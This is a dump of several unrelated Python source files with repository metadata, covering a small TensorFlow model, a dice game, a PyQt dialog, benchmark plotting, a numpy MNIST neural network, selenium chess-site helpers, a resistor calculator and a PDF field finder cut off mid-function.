6905a454932f60a0a1ba54a2c58c813a785ca1e5 | Python | Anmol6/DNGO-BO | /models/model_basis.py | UTF-8 | 2,618 | 2.671875 | 3 | [] | no_license | import tensorflow as tf
import numpy as np
'''
Specifies model used as basis function
for linear input-output mapping
'''
class BasisModel():
    '''TensorFlow-1 (graph mode) feed-forward network used as the basis
    function for a linear input-output mapping.

    Three sigmoid hidden layers of width 20/40/30 feed a linear scalar
    output; the third hidden layer's activation (``_l3``) is the basis
    function itself.  With ``train_mode=False`` the input becomes a
    trainable tf.Variable so it can be optimised w.r.t. the input.
    '''
    def __init__(self,dim_in,train_mode = True ):
        self._dim_input = dim_in
        dim_output = 1
        n_hidden1 = 20
        n_hidden2 = 40
        n_hidden3 = 30
        self._basis_dim = n_hidden3
        self._train_mode = train_mode
        if(train_mode == True):
            # Training: input is a plain placeholder with variable batch size.
            self._x_in = tf.placeholder(tf.float32, shape = [None,self._dim_input],name="plzwork1")
            self._x_inn = self._x_in
        else:
            # Optimisation-over-input: the network input is a trainable
            # Variable; _var_op copies the placeholder value into it.
            with tf.name_scope("trainable_basis_model"):
                self._x_in = tf.placeholder(tf.float32, shape = [1,self._dim_input],name="plzwork2")
                init_val = np.random.normal(size = (1,self._dim_input))
                self._x_inn = tf.Variable(init_val,name = "wrtin",dtype= tf.float32)
                self._var_op = tf.assign(ref = self._x_inn, value=self._x_in, validate_shape = False)
        self._w1 = tf.Variable(tf.truncated_normal([self._dim_input,n_hidden1]))
        self._b1 = tf.Variable(tf.zeros([n_hidden1]))
        l1 = tf.nn.sigmoid(tf.matmul(self._x_inn,self._w1) + self._b1)
        self._w2 = tf.Variable(tf.truncated_normal([n_hidden1,n_hidden2]))
        self._b2 = tf.Variable(tf.zeros([n_hidden2]))
        l2 = tf.nn.sigmoid(tf.matmul(l1,self._w2) + self._b2)
        self._w3 = tf.Variable(tf.truncated_normal([n_hidden2,n_hidden3]))
        self._b3 = tf.Variable(tf.zeros([n_hidden3]))
        self._l3 = tf.nn.sigmoid(tf.matmul(l2,self._w3) + self._b3) #this output is the basis function
        self._w4 = tf.Variable(tf.truncated_normal([n_hidden3,dim_output]))
        self._b4 = tf.Variable(tf.zeros([dim_output]))
        self._y_pred = tf.matmul(self._l3,self._w4) + self._b4
        #Saver object for saving nnet parameters (weights/biases only; the
        #trainable input variable is deliberately excluded)
        self._save_params = tf.train.Saver({"w1":self._w1, "b1": self._b1,"w2":self._w2, "b2": self._b2,"w3":self._w3, "b3": self._b3, "w4":self._w4, "b4": self._b4})
    def get_params(self):
        # Return the graph tensors callers need; the richer tuple in the
        # non-training branch includes the basis output and the copy op.
        if(self._train_mode):
            return self._x_in, self._y_pred
        else:
            return self._x_in, self._x_inn, self._y_pred, self._l3, self._var_op, self._basis_dim
    def save_model(self,sess,path):
        # Checkpoint the saved parameters under <path>model.ckpt.
        save_path = self._save_params.save(sess, path + 'model.ckpt')
        return save_path
    def load_model(self, sess, path):
        # Restore the parameters previously written by save_model().
        self._save_params.restore(sess, path)
| true |
6da6d17b173138a4143282fc90b852d25972990b | Python | PavlovStanislav/Pytnon | /Lab_5.py | UTF-8 | 1,087 | 3.859375 | 4 | [] | no_license | from random import randint
import time
def dice_throw():
    """Play 5 rounds of dice between two named players and announce the winner.

    Each round both players roll one die; the higher roll earns a point and a
    draw gives each player half a point.  All interaction happens via
    stdin/stdout; the function returns None.
    """
    plr1_pts = 0
    plr2_pts = 0
    plr1 = str(input("Input player 1 name: "))
    plr2 = str(input("Input player 2 name: "))
    print(plr1)
    print(plr2)
    for i in range(1, 6):
        print("Next run, number: ", i)
        print(plr1, '`s turn now')
        time.sleep(2)
        n1 = randint(1, 6)
        print('Number is: ', n1)
        print(plr2, '`s turn now')
        time.sleep(2)
        n2 = randint(1, 6)
        print('Number is: ', n2)
        if n1 > n2:
            print(plr1, 'wins.')
            plr1_pts += 1
        elif n1 < n2:
            print(plr2, 'wins.')
            plr2_pts += 1
        else:
            print('Draw')
            # BUG FIX: a draw previously credited both half-points to
            # player 1; each player now receives 0.5.
            plr1_pts += 0.5
            plr2_pts += 0.5
    if plr1_pts > plr2_pts:
        print(plr1 + ' Wins. ' + " Points: " + str(plr1_pts))
    elif plr1_pts < plr2_pts:
        print(plr2 + ' Wins. ' + " Points: " + str(plr2_pts))
    else:
        print('Draw: ', plr1_pts, "+", plr2_pts)

b = dice_throw()
| true |
b22b59a28a68a7a78d5b8f42bccf12d75b3692d1 | Python | BNUCNL/FreeROI | /froi/widgets/clusterstatsdialog.py | UTF-8 | 4,118 | 2.53125 | 3 | [
"BSD-3-Clause"
] | permissive | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from ..interface import csv
class ClusterStatsDialog(QDialog):
    """A dialog for reporting cluster stats."""
    def __init__(self, cluster_info, parent=None):
        super(ClusterStatsDialog, self).__init__(parent)
        # Rows of cluster statistics; each row is indexed 0-5 below as
        # (index, peak value, peak X, peak Y, peak Z, size).
        self._cluster_info = cluster_info
        # Non-modal tool window: the user can keep working underneath it.
        self.setWindowModality(Qt.NonModal)
        self.setWindowFlags(Qt.Tool | \
                            Qt.CustomizeWindowHint | \
                            Qt.WindowTitleHint)
        self._init_gui()
        self._create_actions()
    def _init_gui(self):
        """Initialize GUI."""
        # set dialog title
        self.setWindowTitle("Cluster Stats")
        # initialize widgets
        scroll_content = QWidget()
        # Header row: one centred label per statistics column.
        cluster_idx = QLabel("Index")
        cluster_idx.setAlignment(Qt.AlignCenter)
        peak_val = QLabel("Peak")
        peak_val.setAlignment(Qt.AlignCenter)
        peak_coord_x = QLabel("Peak_X")
        peak_coord_x.setAlignment(Qt.AlignCenter)
        peak_coord_y = QLabel("Peak_Y")
        peak_coord_y.setAlignment(Qt.AlignCenter)
        peak_coord_z = QLabel("Peak_Z")
        peak_coord_z.setAlignment(Qt.AlignCenter)
        cluster_extent = QLabel("Size")
        cluster_extent.setAlignment(Qt.AlignCenter)
        # layout config: header occupies grid row 0
        grid_layout = QGridLayout()
        grid_layout.addWidget(cluster_idx, 0, 0)
        grid_layout.addWidget(peak_val, 0, 1)
        grid_layout.addWidget(peak_coord_x, 0, 2)
        grid_layout.addWidget(peak_coord_y, 0, 3)
        grid_layout.addWidget(peak_coord_z, 0, 4)
        grid_layout.addWidget(cluster_extent, 0, 5)
        # add cluster information: one grid row per cluster record
        row_idx = 1
        for line in self._cluster_info:
            idx = QLabel(str(line[0]))
            idx.setAlignment(Qt.AlignCenter)
            peak_val = QLabel(str(line[1]))
            peak_val.setAlignment(Qt.AlignCenter)
            coord_x = QLabel(str(line[2]))
            coord_x.setAlignment(Qt.AlignCenter)
            coord_y = QLabel(str(line[3]))
            coord_y.setAlignment(Qt.AlignCenter)
            coord_z = QLabel(str(line[4]))
            coord_z.setAlignment(Qt.AlignCenter)
            extent = QLabel(str(line[5]))
            extent.setAlignment(Qt.AlignCenter)
            grid_layout.addWidget(idx, row_idx, 0)
            grid_layout.addWidget(peak_val, row_idx, 1)
            grid_layout.addWidget(coord_x, row_idx, 2)
            grid_layout.addWidget(coord_y, row_idx, 3)
            grid_layout.addWidget(coord_z, row_idx, 4)
            grid_layout.addWidget(extent, row_idx, 5)
            row_idx += 1
        # add labels into a scroll area (vertical scrolling only)
        scroll_content.setLayout(grid_layout)
        scrollarea = QScrollArea()
        scrollarea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
        scrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        #scrollarea.setWidgetResizable(False)
        scrollarea.setWidget(scroll_content)
        # button config
        self.save_button = QPushButton("Export to csv file")
        self.cancel_button = QPushButton("Close")
        hbox_layout = QHBoxLayout()
        hbox_layout.addWidget(self.save_button)
        hbox_layout.addWidget(self.cancel_button)
        vbox_layout = QVBoxLayout()
        vbox_layout.addWidget(scrollarea)
        vbox_layout.addLayout(hbox_layout)
        self.setLayout(vbox_layout)
    def _create_actions(self):
        """Wire the button signals to their handlers."""
        self.save_button.clicked.connect(self._save)
        self.cancel_button.clicked.connect(self.done)
    def _save(self):
        """Export cluster stats info to a file."""
        path = QFileDialog.getSaveFileName(self, 'Save file as ...',
                                           'output.csv',
                                           'csv files (*.csv *.txt)')
        if path:
            labels = ['index', 'max value', 'X', 'Y', 'Z', 'size']
            csv.nparray2csv(self._cluster_info, labels, path)
        self.done(0)
| true |
860abafbb77f08350559386668cf69827ac1f6ff | Python | K4liber/Parralel | /lab1/problem5.py | UTF-8 | 1,216 | 2.828125 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from mpl_toolkits.mplot3d import Axes3D
# Run: python3 problem5.py
# Plot mean runtime versus array size (with std-dev error bars) for the
# three benchmark variants recorded in problem3/4/5.csv.
COLUMN_NAMES = ["size", "time"]

def _load_runs(csv_path):
    """Read one benchmark CSV into a (size, time) DataFrame."""
    return pd.read_csv(csv_path, names=COLUMN_NAMES)

def _size_stats(frame, **std_kwargs):
    """Group by array size; return (means, standard deviations)."""
    grouped = frame.groupby("size", as_index=False)
    return grouped.mean(), grouped.std(**std_kwargs)

df = _load_runs('problem5.csv')
df2 = _load_runs('problem4.csv')
df3 = _load_runs('problem3.csv')

meanDf, stdDf = _size_stats(df)
meanDf2, stdDf2 = _size_stats(df2)
meanDf3, stdDf3 = _size_stats(df3, ddof=0)  # population std, as before

for means, stds, label in (
        (meanDf3, stdDf3, "One thread"),
        (meanDf2, stdDf2, "Two threads"),
        (meanDf, stdDf, "Thread pool (two threads)"),
):
    plt.errorbar(x=means["size"].values, y=means["time"].values,
                 yerr=stds["time"].values, fmt='-o', label=label)

plt.xlabel("Array size")
plt.ylabel("Time [ms]")
#plt.yscale("log")
#plt.xscale("log")
plt.legend()
plt.savefig("problem5.png")
plt.show()
| true |
e21720bcbaa2eafc4da36d4ab789cbe38ca40122 | Python | itaditya/Python | /Practise/p1.py | UTF-8 | 213 | 3.40625 | 3 | [] | no_license | #!/usr/bin/env python3.4
def post_name(name):
    """Return *name* with the surname ' Ghada' appended."""
    return name + ' Ghada'
# Demo: ask for the user's first name and print it with the appended surname.
print('This program will assign some cool name to you')
name=input('\nEnter Your First Name\n')
name=post_name(name)
print('\n',name)
| true |
f6146e1988b9074a2d84fc6d2a83aa9187efabef | Python | JonathanSpiller/simpleajax | /home/views.py | UTF-8 | 364 | 2.515625 | 3 | [] | no_license | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from time import sleep
@login_required
def home(request):
    """Render the home page; only reachable by authenticated users."""
    return render(request, 'home/home.html')
def get_data(request):
    """AJAX endpoint: return a plain-text payload after a simulated delay."""
    sleep(1)  # simulate a slow backend call before responding
    #fetch something from the database
    car = "Porche 911"
    return HttpResponse(car)
fb5c74851bfc4ef41f067823b8d31aafc6a4e1a5 | Python | anacampesan/typoglycemia_py | /typoglycemia.py | UTF-8 | 641 | 3.78125 | 4 | [] | no_license | import random
# in case you want the user to be able to enter his/her own text:
# test = input()
# Sample sentence scrambled by the call at the bottom of the file.
text = "The mind's ability to decipher a mis-spelled word if the first and last letters of the word are correct."
def typoglycemia(text):
    """Scramble the interior letters of every word longer than three
    characters, keeping the first and last letters in place."""
    def scramble(word):
        if len(word) <= 3:
            return word
        middle = list(word[1:-1])
        random.shuffle(middle)
        return word[0] + ''.join(middle) + word[-1]

    return ' '.join(scramble(word) for word in text.split())
# Call form works under both Python 2 and Python 3 (the parentheses are a
# harmless grouping in py2); the bare print statement was py2-only.
print(typoglycemia(text))
| true |
ae6ff8d73a4b517a425097454ec7cc9256c188a5 | Python | mattkim8/CSI | /Lab11.py | UTF-8 | 548 | 2.953125 | 3 | [] | no_license | #Lab 5
def read_file(x):
    """Parse a comma-separated restaurant file into a dict.

    Each line must have exactly 5 fields: the third field becomes the key
    and the remaining four fields the value tuple.  Malformed lines are
    reported and skipped; a missing file is reported and yields an empty
    dict.  The path argument is now honoured (it was previously ignored in
    favour of a hard-coded 'restaurant.txt').
    """
    restaurants = dict()
    try:
        # `with` guarantees the handle is closed (it previously leaked).
        with open(x, 'r') as file_handle:
            for line in file_handle:
                stripped_line = line.rstrip()
                split_line = stripped_line.split(',')
                if len(split_line) != 5:
                    # Replaces the original dangling `if` (a syntax error).
                    print(line)
                    print('there are not 5 values')
                    continue
                restaurants[split_line[2]] = (split_line[0], split_line[1], split_line[3], split_line[4])
    except IOError:
        print("file doesn't exist")
    return restaurants
| true |
0eaafaa406c08f0cc8a0f6435a6dfb0dbdd28608 | Python | 22pilarskil/ImageRecognition | /vectorizedNetwork.py | UTF-8 | 9,298 | 2.84375 | 3 | [] | no_license | import numpy as np
import random
import codecs
import matplotlib.pyplot as plt
import json
def displayImage(pixels, label=None):
    """Show a grayscale image in a matplotlib window, titled with its label."""
    figure = plt.gcf()
    figure.canvas.set_window_title("Number display")
    if label is None:
        plt.title("No label")
    else:
        plt.title("Label: \"{label}\"".format(label=label))
    plt.imshow(pixels, cmap="gray")
    plt.show()
def compressImage(pixels, imageWidth, imageHeight, newWidth, newHeight):
    """Downsample a flat pixel buffer to (newHeight, newWidth) and return it.

    Uses nearest-neighbour sampling.  The original function computed the
    scale factors and reshaped the input but never produced a result; it
    now returns the resized 2-D array.
    """
    image = np.asarray(pixels).reshape(imageHeight, imageWidth)
    # Source row/column index for each destination pixel.
    rows = np.arange(newHeight) * imageHeight // newHeight
    cols = np.arange(newWidth) * imageWidth // newWidth
    return image[np.ix_(rows, cols)]
def createCoefficient(we):
    """Return an array with 1.0 where *we* is nonzero and 0.0 where it is
    zero (0/0 produces nan, which nan_to_num maps back to 0)."""
    ratio = we / we
    return np.nan_to_num(ratio)
def loadData(dataDir="/Users/MichaelPilarski1/Desktop/Neural_Network/data/"):
    """Load the MNIST training and test sets from *dataDir*.

    Returns {"train": ..., "test": ...}, each an array of
    (image, one-hot-label) pairs with pixel values scaled to [0, 1].
    The directory is now a parameter (defaulting to the previous
    hard-coded path) so other machines can reuse the loader.
    """
    print("Loading Data...")
    def toInt(b):
        # IDX headers store big-endian 32-bit integers.
        return int(codecs.encode(b, "hex"), 16)
    def normalize(rawArray, range_):
        # Map values from [range_[0], range_[1]] into [0, 1].
        array = np.copy(rawArray).astype(np.float32)
        if range_ == (0, 1):
            # BUG FIX: previously returned the range tuple itself instead
            # of the (already normalized) array.
            return array
        array-=range_[0]
        dist = abs(range_[0])+abs(range_[1])
        array /= dist
        return array
    def vectorize(num):
        # One-hot encode a digit 0-9.
        array = np.zeros(10)
        array[num] = 1
        return array
    def loadFile(fileName, mode="rb"):
        with open(fileName, mode) as raw:
            data = raw.read()
        magicNumber = toInt(data[:4])
        length = toInt(data[4:8])
        if magicNumber==2049:
            #labels
            parsed = np.frombuffer(data, dtype=np.uint8, offset = 8)
        elif magicNumber==2051:
            #images: flatten each 28x28 image into one row
            numOfRows = toInt(data[8:12])
            numOfColumns = toInt(data[12:16])
            parsed = normalize(np.frombuffer(data, dtype=np.uint8, offset = 16).reshape(length, numOfRows*numOfColumns), (0, 255))
        else: return -1
        return parsed
    data = {"train":[], "test":[]}
    trainImages = loadFile(dataDir + "train-images-idx3-ubyte")
    trainLabels = loadFile(dataDir + "train-labels-idx1-ubyte")
    data["train"] = np.asarray(list(zip(trainImages, np.asarray([vectorize(i) for i in trainLabels]))))
    testLabels = loadFile(dataDir + "t10k-labels-idx1-ubyte")
    testImages = loadFile(dataDir + "t10k-images-idx3-ubyte")
    data["test"] = np.asarray(list(zip(testImages, np.asarray([vectorize(i) for i in testLabels]))))
    return data
'''
Before using this function, you must first download all four of the binary array files from this link (http://yann.lecun.com/exdb/mnist/)
Drag them to your directory without double clicking them, and only once you have placed them in a separate directory (in my case, 'data') do you double click them
Change the argument in the laodFile function to the directory paths of each of the files
'''
def sigmoid(x):
    """Logistic function 1 / (1 + e^-x), applied element-wise."""
    return 1.0 / (1.0 + np.exp(-x))
def derivSigmoid(x):
    """Derivative of the logistic function: s(x) * (1 - s(x))."""
    s = 1.0 / (1.0 + np.exp(-x))  # sigmoid, inlined
    return s * (1 - s)
def retreiveNetwork():
    """Load saved network parameters from weights.txt / biases.txt.

    Each JSON file maps a layer index (as a string) to a nested list of
    numbers.  Returns (weights, biases): two lists of numpy arrays ordered
    by ascending layer index.
    """
    def take(fileName, mode, dictionary, listName):
        with open(fileName, mode) as JSONFile:
            data = json.load(JSONFile)
        for key, rows in data.items():
            dictionary[key] = np.asarray(rows)
        # Emit layers in numeric key order ("0", "1", ...).
        for key in sorted(dictionary, key=int):
            listName.append(dictionary[key])

    weights = {}
    biases = {}
    w = []
    b = []
    take("weights.txt", 'r', weights, w)
    take("biases.txt", 'r', biases, b)
    return w, b
class Network():
    """Fully-connected feed-forward network trained with mini-batch SGD.

    sizes -- layer widths, e.g. [784, 30, 10].
    Weights default to N(0, 1/sqrt(fan_in)) unless pre-trained
    weights/biases are supplied.  The best-seen parameters are kept in
    storedWeights/storedBiases for early stopping.
    """
    def __init__ (self, sizes, trainedWeights=None, trainedBiases=None, saveNetworkStuff=True):
        self.numOfLayers = len(sizes)
        if (trainedWeights==None):
            self.weights = [np.random.randn(y, x)/np.sqrt(x) for y, x in zip(sizes[1:], sizes[:-1])]
            self.storedWeights = np.copy(self.weights)
            self.biases = [np.random.randn(y, 1) for y in sizes[1:]]
            self.storedBiases = np.copy(self.biases)
        else:
            self.weights = trainedWeights
            self.biases = trainedBiases
        self.saveNetworkStuff = saveNetworkStuff
        # Early-stopping state: lowest percent error seen so far, and the
        # number of consecutive epochs without improvement.
        self.minimum = 100
        self.streak = 0
    def saveNetwork(self):
        """Serialize weights and biases to weights.txt / biases.txt as JSON,
        keyed by layer index."""
        trainedBiases = {}
        trainedWeights = {}
        for i in range(len(self.weights)):
            trainedBiases[i] = []
            trainedWeights[i] = []
            for j, k in zip(self.biases[i], self.weights[i]):
                trainedBiases[i].append(j.tolist())
                trainedWeights[i].append(k.tolist())
        with open("weights.txt", 'w+') as JSONFile:
            json.dump(trainedWeights, JSONFile)
        with open("biases.txt", 'w+') as JSONFile:
            json.dump(trainedBiases, JSONFile)
    def earlyStop(self, totalPercent, epochs):
        """Return True once the error has failed to improve for
        0.05*epochs + 4 consecutive epochs; snapshot the best parameters
        whenever the error does improve."""
        specialNum = .05*epochs+4
        if (totalPercent>self.minimum): self.streak+=1
        else:
            self.minimum = totalPercent
            self.streak = 0
            self.storedWeights = np.copy(self.weights)
            self.storedBiases = np.copy(self.biases)
        if (self.streak>=specialNum): return True
        else: return False
    def SGD(self, trainingData, miniBatchSize, epochs, eta, testData, printNumber, lmbda=0):
        """Train with stochastic gradient descent.

        eta -- learning rate; lmbda -- L2 regularization strength;
        printNumber -- report progress every printNumber epochs.
        Evaluates on testData each epoch, restores the best parameters if
        early stopping triggers, and optionally saves them to disk.
        """
        print("Starting Stochastic Gradient Descent...")
        self.totalCorrect = 0
        self.totalPercent = 0
        def reset():
            self.totalPercent = 0
            self.totalCorrect = 0
        def makeCheck(label):
            # Evaluate the current network on the whole test set and print.
            reset()
            self.totalCorrect = 0
            for x, y in testData:
                percent, correct = self.mse(x.reshape(784, 1), y)
                self.totalCorrect+=correct
                self.totalPercent+=percent
            self.totalPercent/=(len(testData)/100)
            print(label)
            print("Percent Error: %.8f. Total Correct: %d/%d" %(self.totalPercent, self.totalCorrect, len(testData)))
            reset()
        makeCheck("Initialization:")
        for j in range(epochs):
            reset()
            random.shuffle(trainingData)
            miniBatches = [trainingData[k:k+miniBatchSize] for k in range(0, len(trainingData), miniBatchSize)]
            for miniBatch in miniBatches:
                self.updateMiniBatch(miniBatch, eta, lmbda, len(trainingData))
            # Per-epoch evaluation on the test set.
            for x, y in testData:
                percent, correct = self.mse(x.reshape(784, 1), y)
                self.totalCorrect+=correct
                self.totalPercent+=percent
            self.totalPercent/=(len(testData)/100)
            if (j%printNumber==0):
                print("Epoch %d complete. Percent Error: %.8f. Total Correct: %d/%d" %(j, self.totalPercent, self.totalCorrect, len(testData)))
            if (self.earlyStop(self.totalPercent, epochs)):
                # Roll back to the best parameters seen so far.
                print("Network oversaturated- exiting SGD")
                self.weights = np.copy(self.storedWeights)
                self.biases = np.copy(self.storedBiases)
                break
        makeCheck("Final Status:")
        if(self.saveNetworkStuff):
            self.saveNetwork()
            print("Weights and Biases Saved")
    def updateMiniBatch(self, miniBatch, eta, lmbda, n):
        """Accumulate backprop gradients over one mini-batch and take one
        gradient step; the lmbda term adds the L2 weight-decay gradient."""
        weightError = [np.zeros(w.shape) for w in self.weights]
        biasError = [np.zeros(b.shape) for b in self.biases]
        for x, y in miniBatch:
            x = x.transpose()
            deltaWeightError, deltaBiasError = self.backprop(x, y)
            weightError = [we+dwe+(lmbda/len(miniBatch)*w)for we, dwe, w in zip(weightError, deltaWeightError, self.weights)]
            #weightError = [we+dwe for we, dwe in zip(weightError, deltaWeightError)]
            biasError = [be+dbe for be, dbe in zip(biasError, deltaBiasError)]
        self.weights = [w-(((float(eta)/len(miniBatch))*we)) for w, we in zip(self.weights, weightError)]
        self.biases = [b-(((float(eta)/len(miniBatch))*be)) for b, be in zip(self.biases, biasError)]
    def backprop(self, x, y):
        """Return (weightError, biasError): the gradients of the cost for a
        single training example, computed by backpropagation."""
        weightError = [np.zeros(w.shape) for w in self.weights]
        biasError = [np.zeros(b.shape) for b in self.biases]
        delta = [np.zeros(b.shape) for b in self.biases]
        # Forward pass, remembering pre-activations (zs) and activations.
        activation = x.reshape(784, 1)
        activations = [activation]
        zs = []
        z = ""
        for w, b in zip(self.weights, self.biases):
            z = np.dot(w, activation)+b
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # Backward pass: output-layer delta, then propagate toward the input.
        delta[-1] = self.costDerivative(activations[-1], y)
        weightError[-1] = np.dot(activations[-2], delta[-1]).T
        biasError[-1] = delta[-1].T
        for i in range(2, self.numOfLayers):
            z = zs[-i]
            delta[-i] = np.dot(delta[-i+1], self.weights[-i+1]) * derivSigmoid(z).T
            biasError[-i] = delta[-i].T
            weightError[-i] = (activations[-i-1]*delta[-i]).T
        '''
        negs = 0
        x = 0
        for w in weightError:
            for ww in w:
                for www in ww:
                    if (www==0): negs+=1
        print("%d/%d" %(negs, 30*784+10*30))
        '''
        return weightError, biasError
    def feedforward(self, activation):
        """Propagate an input column vector through every layer."""
        for w, b in zip(self.weights, self.biases): activation = sigmoid(np.dot(w, activation)+b)
        return(activation)
    def mse(self, x, y):
        """Return (squared error, correct) for one example; correct is 1
        when the argmax prediction matches the label."""
        prediction = self.feedforward(x).reshape(10)
        correct = 0
        percent = (np.linalg.norm(y.reshape(1, 10)-prediction) ** 2)
        if np.argmax(prediction) == np.argmax(y): correct = 1
        return percent, correct
    def classify(self, trainingData):
        """Print the network's prediction for one (image, label) pair and
        display the image."""
        x = self.feedforward(trainingData[0].reshape(784, 1)).reshape(1, 10)
        print("Network prediction: %d. Actual: %d" %(np.argmax(x), np.argmax(trainingData[1])))
        displayImage(trainingData[0].reshape(28, 28))
    def costDerivative(self, activation, y):
        """Derivative of the quadratic cost w.r.t. the output activations."""
        return activation.T-y
#Parameter Declarations-------------
numOfInputs = 784
epochs = 20
sizeOfMinis = 10
learnRate = 0.5
# Architecture: 784 inputs, one hidden layer of 30, 10 output classes.
sizes = np.array([numOfInputs,30,10])
regularizationParam = 0.0
printNumber = 1
#-----------------------------------
#Learning/Classify------------------
# Resume from the previously saved weights/biases, then continue training.
w, b = retreiveNetwork()
network = Network(sizes, trainedWeights=w, trainedBiases=b, saveNetworkStuff=True)
trainingData = loadData()
#network.classify(trainingData["test"][100])
network.SGD(trainingData["train"], sizeOfMinis, epochs, learnRate, trainingData["test"], printNumber, regularizationParam)
#----------------------------------
| true |
7a00393af784af624b25405468c18d4d8bc57ccb | Python | sheric98/minimax_player | /chessWeb/util.py | UTF-8 | 2,007 | 2.671875 | 3 | [] | no_license | import math
import random
import time

from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
def sleep_random(start, end):
    """Pause for a duration drawn uniformly from [start, end] seconds."""
    time.sleep(random.uniform(start, end))
def remove_popup(driver):
    """Dismiss the site's SEO modal by clicking its close icon."""
    class_name = 'icon-font-chess x modal-seo-close-icon'
    # Wait up to 30 s for the close icon to be present before clicking it.
    el = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, f"//span[@class='{class_name}']")))
    x = driver.find_element_by_xpath(f"//span[@class='{class_name}']")
    x.click()
def wait_indefinite(xpath, driver):
    """Block until an element matching *xpath* appears, retrying forever.

    BUG FIX: WebDriverWait.until raises selenium's TimeoutException, not
    the builtin TimeoutError the loop previously caught, so a timeout
    escaped the retry loop instead of triggering another attempt.
    """
    while True:
        try:
            WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, xpath)))
            break
        except TimeoutException:
            continue
def get_offset(dim):
    """Return a random pixel offset within ~90% of half the dimension,
    or 0 when the dimension is too small to offset."""
    half_span = (math.floor(0.9 * dim) - 1) // 2
    if half_span > 0:
        return random.randint(-half_span, half_span)
    return 0
def click_el(el, driver):
    """Click *el* at a randomized point inside it (less bot-like than a
    dead-center click)."""
    off_x = get_offset(el.size['width'])
    off_y = get_offset(el.size['height'])
    ac = ActionChains(driver)
    ac.move_to_element(el).move_by_offset(off_x, off_y).click().perform()
def get_square_el(square_str, driver):
    """Locate the board-square element for a coordinate like 'e4'."""
    square_id = "{}{}".format(file_num(square_str[0]), square_str[1])
    xpath = "//div[contains(@class,'square-{}')]".format(square_id)
    WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, xpath)))
    return driver.find_element_by_xpath(xpath)
def parse_move(move_str, board):
    """Parse a SAN or UCI move string against *board*; print and exit on
    failure (exactly as before: SAN is tried first, then UCI)."""
    for parse in (board.parse_san, board.parse_uci):
        try:
            return parse(move_str)
        except ValueError:
            continue
    print('Illegal or uninterpretable move')
    exit(-1)
def file_num(x):
    """Map a file letter 'a'..'h' to 1..8."""
    return ord(x) - (ord('a') - 1)
96c20f030fabe6b36699c5d266b0a85a1752431f | Python | gugi200/project2021-UoB-ad20781 | /finding_resitance.py | UTF-8 | 936 | 3.296875 | 3 | [] | no_license | import math
# Candidate resistor values (ohms); both positions draw from the same set.
res_value_1 = [100, 180, 270, 390, 680, 1000]
res_value_2 = res_value_1
res = []
res1 = []
ind = []
'''
((1/res_value_1)+1/res_value_2))**-1
resistance for all combinations in parallel
'''
# Parallel resistance of every (X, Y) pair, recording the index pair.
for r, X in enumerate(res_value_1):
    for c, Y in enumerate(res_value_2):
        res.append(((1 / X) + (1 / Y)) ** -1)
        ind.append((r, c))
'''
zipps every possible resistor combination with indexes of them
'''
# Series combination of any two parallel pairs.  Using len(res) instead of
# the hard-coded 36 keeps this correct if the value list changes size.
for row in range(len(res)):
    for column in range(len(res)):
        value = res[row] + res[column]
        res1.append([value, ind[row], ind[column]])
# Report every network whose total resistance is close to 310 ohms.
for result in res1:
    if 307 < result[0] < 313:
        resistor1 = res_value_1[result[1][0]], res_value_1[result[1][1]]
        resistor2 = res_value_1[result[2][0]], res_value_1[result[2][1]]
        print(result[0])
        print(resistor1, '+', resistor2, '\n')
309e1b47612cd93678c9815352340f002ed0bcf0 | Python | amirgraily7/PDFMetadataExtractor | /py/box_phrase_candidate_finder.py | UTF-8 | 4,064 | 2.890625 | 3 | [] | no_license | from candidate import CandidateFinder, Candidate
import re
MAX_LENGTH = 10000
class BoxPhraseCandidateFinder(CandidateFinder):
    """Find candidates by presence of certain phrases in their box."""
    def __init__(self, field, fid, phrases, candidate_lines,
                 bbox=None, min_height=0, max_height=MAX_LENGTH, min_width=0,
                 max_width=MAX_LENGTH, min_page=0, max_page=None):
        """ Set parameters for the candidate search.

        :param field: The field to search for.
        :param fid: The finder id of this object.
        :param phrases: The phrases to look for in the box.
        :param candidate_lines: The indices of the lines to be designated
            candidates.
        :param bbox: The bounding box within which to search.
        :param min_height: The minimum height box to consider.
        :param max_height: The maximum height box to consider.
        :param min_width: The minimum width box to consider.
        :param max_width: The maximum width box to consider.
        :param min_page: The minimum page number to look on.
        :param max_page: The maximum page number to look on.
        """
        self._phrases = phrases
        self._candidate_lines = candidate_lines
        # Per-document candidate counters, keyed by document id.
        self._counts = {}
        self._min_height = min_height
        self._max_height = max_height
        self._min_width = min_width
        self._max_width = max_width
        self._min_page = min_page
        self._max_page = max_page
        # No bbox means "anywhere": a box covering the full coordinate range.
        self._bbox = bbox if bbox else [0, 0, MAX_LENGTH, MAX_LENGTH]
        CandidateFinder.__init__(self, field, fid)
    def _boxes_in_bbox(self, document):
        """Get all boxes in the bounding box with acceptable dimensions."""
        bbox = self._bbox
        boxes = document.get_boxes()
        return [box for box in boxes if bbox[0] <= box.x0 and
                box.x1 <= bbox[2] and bbox[1] <= box.y0 and
                box.y1 <= bbox[3] and self._allowed_page(box) and
                self._acceptable_dimensions(box)]
    def _allowed_page(self, box):
        """Determine whether a given box is on a page within search bounds."""
        if self._max_page:
            return self._min_page <= box.page <= self._max_page
        else:
            # No upper bound configured: only the lower bound applies.
            return self._min_page <= box.page
    def _has_phrase(self, box):
        """Determine whether a box has the sought phrases."""
        lines = box.get_lines()
        # One alternation pattern matching any of the configured phrases.
        pattern = self.field.settings.pattern_builder.list_pattern(self._phrases)
        for line in lines:
            if re.search(pattern, line.text) is not None:
                return True
        return False
    def _acceptable_dimensions(self, box):
        """Check whether a box falls within the allowed height and width."""
        return self._min_width < box.x1-box.x0 < self._max_width and\
